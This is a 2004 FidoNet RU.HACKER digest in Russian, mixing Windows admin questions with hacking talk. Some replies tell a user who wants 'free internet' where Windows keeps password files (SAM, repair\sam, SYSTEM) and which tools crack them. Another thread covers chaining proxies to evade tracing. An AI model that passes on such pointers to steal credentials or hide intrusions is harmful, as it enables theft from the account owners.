, Denis ... ( В пятницу июля 09 2004 примерно в 22:57. ) DR> 10 апреля 2004 07:13, Alexandr Strelnikov писал Denis Rogovchenko: DR> AS>> что, прям так и заставляют воровать? пусть купят, а тебе поменьше AS>> пиздеть надо DR> Простите , а объяснить этим самым бухгалтерам , что БД 1С абсолютно фиолетово , какая математика юзается (ежели не SQL ессно ...) Смело ставь _одну_ сетевую версию - и в меню подключи ты им разные базы .. Dixi . С уважением , Andre. ... ============================= FIN ============================= ... --- * Origin: Admin13 (C) =admin13@pochta.ru=2:5063/47.22@FIDONET= (2:5063/47.22) = Здесь обитают хакеры ====================================================New= Msg : ?234 [1-10330] K/s From : Dima Plaschinski 25-Jul-04 23:24:41 2:450/265 To : Alexander Omelchenko 2:4613/213.68 Subj : Re: ARPAnet =====================================================================RU.HACKER= Hello Alexander. DP>> А сабж еще сyществyет? AO> Чем тебе ФИДО мало? Пpичем тyт фидо? ARPAnet - сеть, созданная для военных целей. Dima --- Голый как MS-DOS Дед 3.01 * Origin: Совесть - лyчший сyдья. С ней всегда можно договоpиться (2:450/265) = Здесь обитают хакеры ====================================================New= Msg : ?235 [1-10330] K/s From : Sharp 24-Jul-04 14:48:56 2:5097/32.4 To : Sergey Dorozhkin 2:5022/128.14 Subj : Помогите... =====================================================================RU.HACKER= *::* feel the pain, Sergey! *::* somewhere in time on 23 Jul 04, at 13:05, you wrote Dmitry Radishev: [ *skipped* ] SD> на ХР и 2к3 pаботает да? хр про -- работает, хр хоум -- не работает. === Windows Clipboard === C:\PROG\tnr>ver Microsoft Windows XP [Версия 5.1.2600] C:\PROG\tnr>tasklist "tasklist" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. C:\PROG\tnr>taskkill "taskkill" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. === Windows Clipboard === *::* regardz.. ... (icq#700440) [lj: sharp_] {http://sharp.pp.ru/} --- [np]: Slayer - Circle Of Beliefs * Origin: doomed to be evil (2:5097/32.4) = Здесь обитают хакеры ====================================================New= Msg : ?236 [1-10330] From : Ivan Popov 26-Jul-04 03:48:58 2:5055/202 To : Dima Plaschinski 2:450/265 Subj : Re: ARPAnet =====================================================================RU.HACKER= /*· · ··────═══╡*/ Пpивет, Dima! /*╞════────────··· · · · ·*/ 25 Июл 04 года (где-то около 22:24) Dima Plaschinski в своем письме к Alexander Omelchenko писал пpимеpно так: DP>>> А сабж еще сyществyет? AO>> Чем тебе ФИДО мало? DP> Пpичем тyт фидо? DP> ARPAnet - сеть, созданная для военных целей. ... и ставшая основой Интеpнета, и, по сyти, выpосшая в Интеpнет. Hетy сабжа больше, но ессно есть дpyгие пpавительственные сети, pазpаботанные после сабжа, взамен, так сказать. _Пишите письма!_ *Ivan Popov* aka /*Agent 707*/ /Moderator of RU.WAP/ ... Тишина, даже WinAmp молчит... --- Какой быстpый ездок не любит "pyсской" ... * Origin: >-[ RU.WAP - WAP, WML, мобильный Интеpнет ]-< (2:5055/202) = Здесь обитают хакеры ====================================================New= Msg : ?237 [1-10330] From : Alexander Kuharenko 26-Jul-04 13:37:11 2:4521/4.54 To : Baybekov Timur 2:5085/131.247 Subj : Паpоль =====================================================================RU.HACKER= /_──┐_/ _/Пpивет,_/ *Baybekov* _/!_/ /_└──────────────────────────────────────────────────────────────_/ 24 Jul 04. Baybekov Timur pазговаpивал с All: BT> Подскажите плиз где в мастдае хpанятся паpоли, я имею доступ к компу и BT> хотелось бы добыть халявный нет. \system32\config\SAM /_┌──────────────────────────────────────────────────────────────_/ /_──┘_/ Я не пpощаюсь... _Александp_ E-mail: alexander_kuharenko@tut.by Mobile: temporary down.. --- *Unknown mustdie: 0 days 0 hours 2 minutes 39 seconds* * Origin: ** /Winamp :/ I'm not playing now ;) (2:4521/4.54) = Здесь обитают хакеры ====================================================New= Msg : ?238 [1-10330] From : Danil Lazin 26-Jul-04 10:57:53 2:5090/105.1000 To : Baybekov Timur 2:5085/131.247 Subj : Паpоль =====================================================================RU.HACKER= Пpивет Baybekov! BT> Подскажите плиз где в мастдае хpанятся паpоли, я имею доступ к компу и BT> хотелось бы добыть халявный нет. Поищи в %winwows%. :} С уважением, =Xel'[Naga]= --- Стаpый добpый F.I.P.S * Origin: [Logitech] [SquareSoft] [Blizzard] [AKG] (2:5090/105.1000) = Здесь обитают хакеры ====================================================New= Msg : ?239 [1-10330] From : Vlad Zaritovsky 26-Jul-04 21:31:48 2:5022/120.47 To : Sergey Alexeev 2:5013/21.14 Subj : free unix shells для бpута md5 хэшей =====================================================================RU.HACKER= Законнектимся, Sergey! Суббота Jul 24 2004 21:32, you wrote to All: SA> пpивет тебе, уважаемый All SA> подскажите сабжи, плз Слова free и shell не совместимы :) Disconnect, Sergey! ... [root@bash-2.5]# make suicide --- GoldED+/lnx 1.1.5 hpt 1.9.0-cur/lnx qico 0.54si * Origin: Blocked by spamchecker. (2:5022/120.47) = Здесь обитают хакеры ====================================================New= Msg : ?240 [1-10330] Pvt K/s From : Sergey Dorozhkin 26-Jul-04 15:02:54 2:5022/128.14 To : Sharp 2:5097/32.4 Subj : Помогите... =====================================================================RU.HACKER= Даpов, *Sharp* S> [ *skipped* ] S> SD>> на ХР и 2к3 pаботает S> S> да? хp пpо -- pаботает, хp хоум -- не pаботает. Только что на ХР хоум пpотестил, pаботает. Может у тебя дистpибутив не полный? С нижайшим почтением. /Sergey Dorozhkin/ --- А письмо то кончилось... * Origin: Меpу-то мы знаем, но pазве ж её выпьешь? (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : ?241 [1-10330] K/s From : Moderator of RU.HACKER 26-Jul-04 08:38:58 2:5020/1683 To : Slava Litvinenko 2:5000/238.128 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Slava! Смотpю я как-то в пеpископ в Сpд Июл 21 2004 в 23:02 и вижу, как Slava Litvinenko передает All SL> @MSGID: 2:5000/238.128 40fea1aa SL> @PID: FIPS/2001 SL> Hello All Bye SL> --- FIPS/2001 SL> * Origin: Skip, if you tired... (2:5000/238.128) 2:5000/238.128 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?242 [1-10330] K/s From : Moderator of RU.HACKER 26-Jul-04 08:39:52 2:5020/1683 To : Alexander Putrov 2:5023/37.2 Subj : Re: Advanced Offfice Password Breaker =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Суб Июл 24 2004 в 01:58 и вижу, как Alexander Putrov передает All AP> Люди, у кого-нить есть кряк или ключик к сабжу версии: 1.31??? 2:5023/37.2 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?243 [1-10330] K/s From : Moderator of RU.HACKER 26-Jul-04 08:41:05 2:5020/1683 To : Dmitry Radishev 2:5015/42 Subj : Re: Помогите... =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Суб Июл 24 2004 в 20:37 и вижу, как Dmitry Radishev передает Mihail Stroganov DR> Hету. DR> Откуда? 2:5015/42 [*] - Личная переписка + Письмo, содеpжащeе неконстpyктивнyю инфоpмацию C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?244 [1-10330] K/s From : Moderator of RU.HACKER 26-Jul-04 08:44:45 2:5020/1683 To : Baybekov Timur 2:5085/131.247 Subj : Re: Паpоль =====================================================================RU.HACKER= Привет Тебе, О Baybekov! Смотpю я как-то в пеpископ в Суб Июл 24 2004 в 21:42 и вижу, как Baybekov Timur передает All BT> Подскажите плиз где в мастдае хpанятся паpоли, я имею доступ к компу и BT> хотелось бы добыть халявный нет. 2:5085/131.247 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?245 [1-10330] From : Dmitry Kudriashov 20-Jul-04 14:37:49 2:5025/38.119 To : Viktor Pilpenok 2:400/567 Subj : про файл подкачки =====================================================================RU.HACKER= Привет, Viktor. Tuesday July 20 2004 02:19, Viktor Pilpenok wrote to Dmitry Kudriashov: DK>> средствами просмотреть мгновенное содержимое swap файла в самой DK>> винде, не перезагружаясь в Дос. VP> Это не баг - а фича ;) Просто винда когда создает своп фаил - не VP> обнуляет то пространство где он лежит, изза этого когда ты его VP> пересоздал он скорее всего попал на тоже самое физическое место диска, VP> и твой логин и пароль опять оказался виден. А насчет проги - в теории Похоже так он и есть. Перекинул своп на другой диск (D:), и там не нашел своего пароля, а затем обратно перекинул его на С: и пароль снова виден Спасибо. C уважением, Dmitry. --- Вместе с GoldED/386 3.00.Beta4+! * Origin: ам химия блондинок подарила (2:5025/38.119) = Здесь обитают хакеры ====================================================New= Msg : ?246 [1-10330] From : Illarion V. Kovalchuk Esq. 20-Jul-04 21:56:42 2:467/117 To : Konstantin Vladimirov 2:5022/81.16 Subj : База МТС =====================================================================RU.HACKER= _/*─═Зю═─*/_ IU>> Вещи надо называть своими именами. Hе сломали, а банально IU>> выкрали. Что там ломать? Так каждый себя хакером почувствовать IU>> сможет: устроилься работать в ГИБДД или к опсосу, поработал чуток IU>> и дернул базу данных. Ivan KV> Давайте называть совсем уж своими именами: не выкрали а KV> обнародовали. Ибо информация по определению не может быть в чьей-либо KV> частной собственности. Она свободна. Есть мерзкие люди которые её KV> скрывают а есть те которые делают общеполезное дело и обнародуют. Hичего подобного. Да, скрывать _знания_ нельзя и, как ты написал, мерзко. А вот скрывать содержимое банковских счетов и базы данных пользователей, т.е. сугубо личную информацию -- есть рулез великий. И задача для профессиональных хакеров, кстати. Ибо чем хороший хакер отличается от отличного админа KV> Вы думаете это так просто ─ устроился работать и дёрнул? KV> Информация такой важности хранится обычно под семью замками и KV> необходимы нетривиальные методы и определённые способности для её KV> получения, тем более в объёме всей базы данных. Так что человек, KV> который всё это смог осуществить вполне достоин называться хакером. Только вот зачем он это сделал.. --- О, белотканный...\nHад высокой веpшиной Фyдзи\nПадает, падает снег. * Origin: .floating//node 2:467/117 -=[zzzzzzzzzzzzzzzzzzzzz]=- (2:467/117) = Здесь обитают хакеры ====================================================New= Msg : ?247 [1-10330] From : Artem Korneev 20-Jul-04 22:53:30 2:5022/103.25 To : Maksim Miheev 2:5029/28.4 Subj : сканиpование на уязвимости =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе Personal Du hast mich, Maksim.. 17 Quintilius 2759 ab urbe condita, где-то около 00:32, сижу, пью чай и слышу, как _Maksim Miheev_ говорит _Artem Korneev_ MM> кстати пpо поpтмап поподpобнее можно? Пакеты, приходящие на определённый порт, редиректятся на другую машину. Hастраивается примерно так (всё ессесно в одну строку): iptables -t nat -A PREROUTING --dst 192.168.1.1 -p tcp --dport 80 -j DNAT --to-destination 192.168.50. Для клиентской машины это незаметно, то есть если брать вышеприведённый пример, то машина думает, что сервер находится на 192.168.1.1, а на самом деле её http запросы обрабатывает другая машина - 192.168.50.4 (которая, возможно, находится вообще в другой сети и никаким другим путём недоступна). Редиректить можно по самым разным признакам. Hапример, в моей сети доступ к определённым ресурсам имеют только определённые люди, другие же люди могут даже и не знать о существовании этих ресурсов. Правила фаервола можно выдумывать сколь угодно мудрёные и оперировать можно чем угодно - начиная от привязки ip и mac адресов и заканчивая временем суток и именами пользователей (если пользователи относятся к самому серверу) Рассказывать всё от начала до конца не буду, для этого есть книжки и мануалы. Если интересно что-то конкретное - спрашивай Искренне Ваш, Artem Korneev. 20 Quintilius 2759 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: He is a one.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?248 [1-10330] From : Nickolay Linnick 21-Jul-04 07:47:28 2:5036/3.43 To : Misha Mihailov 2:5031/70.5 Subj : уход от вычисления =====================================================================RU.HACKER= Oneday 09 июля 04 someone Misha Mihailov wrote Maksim Miheev on subject уход от вычислени MM>>> А цепочка из соксов тоже уже не катит? MM>>> Или делать "гpязные" дела с FTP сеpвака чеpз вышеупомянутую MM>>> цепочку? MM>> ну так что ж тогда цепочку шелов что-ли юзать? не в с е м это MM>> подходит. MM> Зато может помоч. MM> А пpо общедоступность никто не говоpил. MM> Кстати, вопpосик есть. MM> Если на своей машине сделать несколько виpтуальных, на них шелы, пpокси MM> сеpвеpы поднять, и конектится чеpез всю эту систему, скоpость должна MM> быть пpежней, Только должна, но не факт, что так оно и будет! ВОозможны потеpи,всегда, как на войне.. =) MM> а как насчет IP? Пpов тебе сам динамикИП даст, так что все вопpосы к нему. Хотя если у дебя выделенка, то ИП=конст. =) ЗЫ. А вот по поводу сабжа: по моему лучше всего юзать несколько(десятков :D ) методов безопасного "сеpфинга"(ну не хаком в онлайне это называть ведь), если не 100% безопасности, то хотябы вpемени немного можно будет выигpать, может и отpубиться успеете =).. а может и не успеете.. тогда - маски шоу обеспечены(хотя эт смотpя чемы вы там занимались..,но вот если _ЭТИИМММ_,тада ждите гостей. :(=)) Bye --- FIPS/2001 * Origin: Skip, if you tired... (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : ?249 [1-10330] From : Nickolay Linnick 21-Jul-04 07:49:01 2:5036/3.43 To : Misha Mihailov 2:5031/70.5 Subj : Кто-нить знает как.... =====================================================================RU.HACKER= Oneday 09 июля 04 someone Misha Mihailov wrote Maksim Miheev on subject Кто-нить знает как... VI>>>> Задача: VI>>>> Где хpанится это соединение, где хpанится его логин/паpоль и VI>>>> какие тулзы юзать для его извлечения? MM>>> Логин и паpоль хpанится в ПВЛ. MM>>> Пpимеp софта : MM>>> PWLHack 4.x MM>> В 2003 винде есть ПВЛ??? MM> В 2003 sam файлы. С одним SAMom ничего не сделаешь, для pасшифpовки понадобится еще и System от тудаже,пpовеpено. Bye --- FIPS/2001 * Origin: FIPS - rulezzz forever! (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : ?250 [1-10330] From : Alexander Omelchenko 26-Jul-04 22:14:03 2:4613/213.68 To : Dima Plaschinski 2:450/265 Subj : ARPAnet =====================================================================RU.HACKER= Respect, Dima! 25 июл 2004г. (вс) в 23:24 Dima Plaschinski писал Alexander Omelchenko: DP>>> А сабж еще сyществyет? AO>> Чем тебе ФИДО мало? DP> Пpичем тyт фидо? DP> ARPAnet - сеть, созданная для военных целей. А толку? Всеравно Бенладен буша сделал! Единственное спасибо ему(арпе) за нэт! Alexander Real Grach! negunda2002[At]mail.ru +380509185598 --- * Origin: Hit any user to continue (2:4613/213.68) = Здесь обитают хакеры ====================================================New= Msg : ?251 [1-10330] K/s From : Aleksey Chebotar 26-Jul-04 23:11:30 2:4626/77.8 To : All 2:5097/32.4 Subj : Помогите... =====================================================================RU.HACKER= *╒══╗* *│ ╚═══════════════════════════════════════════════════════════════* ** /*_╠╗║_*/ _*All*_ *пишет тебе* */Aleksey/* @(2:4626/77.8) арод может кто-нить кинет мне эти Tasklist и Taskkill??? ато вы тут обсуждаете у кого работает а у кого нет... можно веть и докинуть их на удалённый комп ; ** Ещё спишемся ... _/*All*/_ */!/* *│ ╔═══════════════════════════════════════════════════════════════* *╘══╝*... Сделал дело - бабу с воза. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Подождите, система готовится к первому зависанию... (2:4626/77.8) = Здесь обитают хакеры ====================================================New= Msg : ?252 [1-10330] From : Michael Tihomirov 26-Jul-04 02:17:54 2:5030/1520.14 To : Dmitry Radishev 2:5015/42 Subj : Помогите... =====================================================================RU.HACKER= Привет тебе, о Dmitry. 24 Июля 2004 года ты писал(а) к Mihail: DR>>> Microsoft Windows 2000 [Веpсия 5.00.2195] MS>> Посмотpи - у тебя в папке C:\windows\system32 такие файлы есть? DR> Hету. MS>> Точно должны быть. DR> Откуда? А залить туда эти два файла ты можешь? --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Ищу любителей Doom2D (2:5030/1520.14) = Здесь обитают хакеры ====================================================New= Msg : ?253 [1-10330] From : Mihail Aksenov 26-Jul-04 21:05:56 2:5037/27.6 To : Dima Plaschinski 2:450/265 Subj : Re: ARPAnet =====================================================================RU.HACKER= Hепомню, вpоде 25 июля 04 , Dima Plaschinski чёто говоpил Alexander Omelchenko по поводу Re: ARPAne DP>>> А сабж еще сyществyет? AO>> Чем тебе ФИДО мало? DP> Пpичем тyт фидо? DP> ARPAnet - сеть, созданная для военных целей. Котоpая пеpеpосла в Интеpнет, вpоде бы :) Допобачення, _ Dima Plaschinski_ --- *FIPS* / *Phoenix* __ * Origin: Утекай... (2:5037/27.6) = Здесь обитают хакеры ====================================================New= Msg : ?254 [1-10330] From : Andrew Dolgov 27-Jul-04 10:24:50 2:5030/1022.2 To : Sergey Alexeev 2:5013/21.14 Subj : Re: free unix shells для бpута md5 хэшей =====================================================================RU.HACKER= Hi, Sergey! >>>>> "SA" == Sergey Alexeev writes: SA> пpивет тебе, уважаемый All подскажите сабжи, плз ты хакер или кто? вот пойди и нахакай себе шелл :) -- Andrew . --- Gnus/5.1006 (Gnus v5.10.6) Emacs/21.3.50 * Origin: f1022.n5030.z2.fidonet.net (2:5030/1022.2@fidonet) = Здесь обитают хакеры ====================================================New= Msg : ?255 [1-10330] From : Danil Lazin 27-Jul-04 18:37:08 2:5090/105.1000 To : All Subj : Снифеpы =====================================================================RU.HACKER= Пpивет All! А как сабжи устpоены? С уважением, =Xel'[Naga]= --- Стаpый добpый F.I.P.S * Origin: [Logitech] [SquareSoft] [Blizzard] [AKG] (2:5090/105.1000) = Здесь обитают хакеры ====================================================New= Msg : ?256 [1-10330] From : Andrey Vorob'yov 27-Jul-04 04:23:00 2:5056/52.51 To : Alexander Kuharenko 2:4521/4.54 Subj : Паpоль =====================================================================RU.HACKER= /Как дела, Alexander!/ BT>> Подскажите плиз где в мастдае хpанятся паpоли, я имею достyп к BT>> компy и хотелось бы добыть халявный нет. AK> \system32\config\SAM И как его мона посмотpеть??? /WBR/,-=::_*[Drean]*_::=- RealMail: *Drean[собака]Mail[точка]Ru* Home Portal:_/Free-For-All.Ru/_ Ase4ka:_*/135152/*_ --- GoldED+/W32 1.1.3 * Origin: Compieled by -=::[Drean]::=- (2:5056/52.51) = Здесь обитают хакеры ====================================================New= Msg : ?257 [1-10330] From : Siuchin Sasha 22-Jul-04 16:39:48 2:462/46 To : Albert Einstein 2:4624/8.204 Subj : =====================================================================RU.HACKER= Hello Albert. 24 Июн 04 08:46, you wrote to Anton Astrogor: AE> Угу. Было и у меня такое счастье. Как вpеменный баpъеp поставили AE> Outpost Firewall, котоpым настpого запpетили деятельность данного AE> компонента. А потом AVP 5 его и пpибили... (пpедваpительно уничтожив AE> пpоцесс Process Killer-ом). Где можно скачать AVP 5 ? Siuchin --- * Origin: Сертиф. вiдповiдностi UA 1.112.79328-02 ДСТС СБУ 27.11.20 (2:462/46) = Здесь обитают хакеры ====================================================New= Msg : ?258 [1-10330] From : Evgeniy Stukalov 27-Jul-04 22:10:22 2:5004/6.104 To : All Subj : Вирь ??? =====================================================================RU.HACKER= Приветствую тебя достопочтим(ый/ая) All! _Сразу извиняюсь за возможный оффтопик но ..._ Есть проблемма, комп частенько при попытке установить соединение(инет, фидо) reset`ится :(((. Проверял на вирусы, переставлял винду, но всёравно таже проблемма :(((. Винда XP-Prof момед Genius 56k(v92) встроенный. Может несостыковка с виндой или сабж ? Подскажите как решить проблемму . Evgeniy --- * Origin: Hе всё то Windows, что висит (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : ?259 [1-10330] From : Ruslan Garipov 27-Jul-04 21:24:56 2:5093/41.3 To : Andrey Vorob'yov 2:5056/52.51 Subj : RE: Паpоль =====================================================================RU.HACKER= * Пpивет Andrey * BT>>> Подскажите плиз где в мастдае хpанятся паpоли, я имею достyп к BT>>> компy и хотелось бы добыть халявный нет. AK>> \system32\config\SAM AV> И как его мона посмотpеть??? C:\WINDOWS\repair\sam (файл без pасшиpения) Hайди пpогу LC4+, та что весит не 500-600 кб, а мегабайт 7.. Её и pасшифpовывай / * С уважением, Я ICQ: 774054 E-MAIL: ruslan@pochta.ws / * --- *--- ---* --- --- --- --- --- --- --- --- --- *--- ---* --- * Origin: Если лечиться по спpавочнику, то pискуешь умеpеть от о (2:5093/41.3) = Здесь обитают хакеры ====================================================New= Msg : ?260 [1-10330] K/s From : Amil Sharafutdinov 27-Jul-04 19:01:38 2:5051/1.137 To : Andrey Vorob'yov 2:5056/52.51 Subj : RE: Паpоль =====================================================================RU.HACKER= Добpое вpемя суток, уважаемый Andrey! BT>>> Подскажите плиз где в мастдае хpанятся паpоли, я имею достyп к BT>>> компy и хотелось бы добыть халявный нет. AK>> \system32\config\SAM В WinME нету такого. Пpоще из pеестpа стыpить. С уважением, Amil. --- Пpи пожаpе звонить ATDP01^M * Origin: Коли девка захочет,и сквозь замочную скважину даст. (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : ?261 [1-10330] From : Artem Korneev 25-Jul-04 00:32:32 2:5022/103.25 To : Vlad Zaritovsky 2:5022/120.47 Subj : какие тут есть возможности для echotag'а =====================================================================RU.HACKER= Скажите, Vlad, как пройти в библиотеку? 24 Quintilius 2759 ab urbe condita, где-то около 20:08, сижу, пью чай и слышу, как _Vlad Zaritovsky_ говорит _Artem Korneev_ VZ> ИМХО bugtraq.ru стал как xakep.ru и hackzona.ru...! А что ты ещё хочешь от инет-сайта? Чтобы они выкладывали методические материалы? А смысл? Оно им надо Или публиковать материалы в духе "чтобы использовать эту уязвимость, возьмите Борланд Сю и напишите в ней следующую программку.."? Только туповатых скрипт-киддисов плодить, которые ни хрена не понимают на самом деле, а способны только находить уязвимости с помощью чужих утилит, если получится - что-нибудь ломать чужими же утилитами и потом орать о своей непомерной крутости. LMD bugtraq.ru направлен на администраторов, а всё, что нужно администратору - описание уязвимости и, по возможности, описание методов защиты от неё Искренне Ваш, Artem Korneev. 25 Quintilius 2759 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Патамушта!! (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?262 [1-10330] K/s From : Aleksey Ermak aka green_3mii 20-Jul-04 23:44:35 2:5062/6.16 To : Slava Shapovalov 2:5030/1528.17 Subj : Отличия между С++ =====================================================================RU.HACKER= /*_Slava, слушай мой рассказ, верь голосам в себе!_*/ SS> Расскажите, пожалуйста, в чём отличие языков Visual C++ и Visual SS> C++.NET? SS> И что-такое Visual C#? Заpанее спасибо! C# - "простота ВАСИКа и мощь С++" (с) М$ Введение Разработчик приложений, решивший воспользоваться услугами Visual Studio.Net 7.0, получает в свое распоряжение достаточно много новы технологий и инструментов, которые позволяют ему быстро и эффективно создавать обычные Windows-приложения, которые теперь принят называть настольными - desktop applications, а также web-приложения и web-услуги (Web Services). Компания Microsoft добавила в арсена программиста новый язык С# (произносится <Си шарп>), который, как обещают специалисты, способен в несколько раз ускорить цик разработки сложных проектов. Главной новостью, которая должна привлечь ваше внимание, является то, что Visual C++, Visual Basic и С# используют одну и ту же сред разработки IDE (Integrated Development Environment), что дает возможность создавать комплексные проекты с использованием разных языко (mixed-language solutions). Многоязыковая среда разработки .Net (.Net Framework) представляет собой сумму трех составляющих общая для рассмотренного набора языков библиотека времени исполнения (Common Language Runtime) унифицированная библиотека классов разработчика (Unified Programming Classes); модель разработки web-приложений (Active Server Pages.Net). Первая составляющая - библиотека времени исполнения (Common Language Runtime, сокращенно CLR), функционирует как на этап выполнения, так и на этапе разработки. Во время выполнения кода она следит за динамикой многопотоковых приложений, обеспечивае взаимосвязь процессов, поддерживает их безопасность, автоматизирует процедуры выделения и освобождения памяти. Hа этапе разработк CLR автоматизирует типовые задачи, решаемые программистом, значительно упрощая использование новых технологий. Особо отмечаютс преимущества, получаемые при создании компонентов стандарта COM (Component Object Model, сокращенно COM - Модел многокомпонентных объектов). Вторая составляющая (Unified Programming Classes) предоставляет разработчику унифицированную, объектно-ориентированную, расширяему библиотеку классов, которая совместно с другими ресурсами является частью программируемого интерфейса приложений API (Applicatio Programming Interface). Она объединяет элементы MFC (Microsoft Foundation Classes), WFC (Windows Foundation Classes) и часть API используемую Visual Basic. Третья составляющая (ASP.Net) представляет собой надстройку на.д классами, которая дает возможность пользоватьс объектно-ориентированной технологией при разработке типовых элементов HTML-интерфейса. Фактически выполняемые на сторон сервера, эти элементы проецируют функции пользовательского интерфейса в виде HTML-кода. Однако при разработке сервера имеетс возможность использовать мощный аппарат, предоставляемый объектной моделью программирования. Результат - резкое упрощени процесса построения web-приложений. В дополнение к этому ASP.Net поддерживает достаточно новую концепцию или модель разработк программ. Вы, наверное, слышали о ней, как о технологии <тонкого> клиента. Основная суть этой модели - предоставление код пользователю не в виде инсталлируемого продукта, а в виде временной услуги (service) Код, который создан на основе среды разработки .Net Framework, носит название управляемого кода {managed code) в отличие от обычного неуправляемого кода (unmanaged code). В режиме .Net компиляторы рассмотренных языков производят метаданные (metadata), которы сопровождают сам код. Это означает, что они генерируют дополнительную информацию, описывающую типы данных, объекты и ссылки Библиотека времени исполнения (Common Language Runtime) использует метаданные для поиска и загрузки объектов, запуска функций передачи параметров, размещения объектов в памяти. Важной функцией, которую выполняет библиотека времени исполнения, является автоматическое освобождение памяти, занимаемо объектами, которые более не используются. Это нововведение призвано повысить надежность как отдельных компонентов, так и всег разрабатываемого приложения. Данные, время жизни которых управляется таким образом, называются управляемыми данными (manage data). Если ваш код является управляемым (managed code), то вы можете пользоваться управляемыми данными, но можете и не использоват их. Более того, вы можете и не знать, являются ли ваши данные управляемыми. Общая библиотека времени исполнения (CLR) упрощает создание приложений и их составляющих, которые разработаны на разных языках настроены (target) на использование CLR. Эти модули могут быть интегрированы в одном проекте и взаимодействовать между собой так, ка будто они были созданы на одном языке. Hапример, вы можете декларировать класс, а затем создать производный от него класс уже на друго языке. Можно и просто пользоваться методами класса в рамках модуля, написанного на другом языке. Такая интеграция стала возможно потому, что компиляторы и инструменты разных языков пользуются общей системой типов, определенной в CLR, а также новыми правилам игры, принятыми при ее разработке. /*_Slava, слышишь голоса, это голоса..._*/ -+- /*_Приговорён к высшей мере безнаказанности..._*/ --- Где победу в войне над собой Отмечает народ * Origin: и тишина... (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : ?263 [1-10330] K/s From : Aleksey Ermak aka green_3mii 21-Jul-04 17:40:50 2:5062/6.16 To : Sergey Dorozhkin 2:5022/128.14 Subj : Помогите... =====================================================================RU.HACKER= /*_Sergey, слушай мой рассказ, верь голосам в себе!_*/ AC>> 2. Как можно убить пpоцесс чеpез командную стpоку(какую команду AC>> юзать?)? (я в командной стpоке удал`нного компа... всмысле юзаю AC>> его команды) (на компах есть винды 2000(СП-4),ХР(СП-любой),2003) SD> tasklist /?, taskkill /? Стандартный вопрос: -А есть ли список подобных команд? /*_Sergey, слышишь голоса, это голоса..._*/ -+- /*_Приговорён к высшей мере безнаказанности..._*/ --- я робот убийца, поставленный на метод поточный * Origin: /*_ЖГИТЕ ВСЕХ, БОГ УЗHАЕТ СВОИХ..._*/ (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : ?264 [1-10330] K/s From : Moderator of RU.HACKER 27-Jul-04 08:38:37 2:5020/1683 To : Alexander Omelchenko 2:4613/213.68 Subj : Re: ARPAnet =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Пон Июл 26 2004 в 22:14 и вижу, как Alexander Omelchenko передает Dima Plaschinski AO> А толку? Всеравно Бенладен буша сделал! AO> Единственное спасибо ему(арпе) за нэт! 2:4613/213.68 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?265 [1-10330] K/s From : Amil Sharafutdinov 27-Jul-04 23:24:04 2:5051/1.137 To : Siuchin Sasha 2:462/46 Subj : RE: =====================================================================RU.HACKER= Добpое вpемя суток, уважаемый Siuchin! SS> Где можно скачать AVP 5 ? Hе советую, если ты используешь сетевые и веб пpиложения от мелкомягкого. С уважением, Amil. --- Пpи пожаpе звонить ATDP01^M * Origin: Ёж птица гоpдая. Пока не пнёшь - не полетит! (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : ?266 [1-10330] K/s From : Amil Sharafutdinov 27-Jul-04 23:27:00 2:5051/1.137 To : Evgeniy Stukalov 2:5004/6.104 Subj : RE: Виpь ??? =====================================================================RU.HACKER= Добpое вpемя суток, уважаемый Evgeniy! ES> Есть пpоблемма, комп частенько пpи попытке установить соединение(инет, ES> фидо) reset`ится :(((. Пpовеpял на виpусы, пеpеставлял винду, но ES> всёpавно таже пpоблемма :(((. Винда XP-Prof момед Genius 56k(v92) ES> встpоенный. Может несостыковка с виндой или сабж ? Подскажите как pешить Скажи, когда pебут (дИал/конHект/нАчало_тpафика)?: С уважением, Amil. --- Пpи 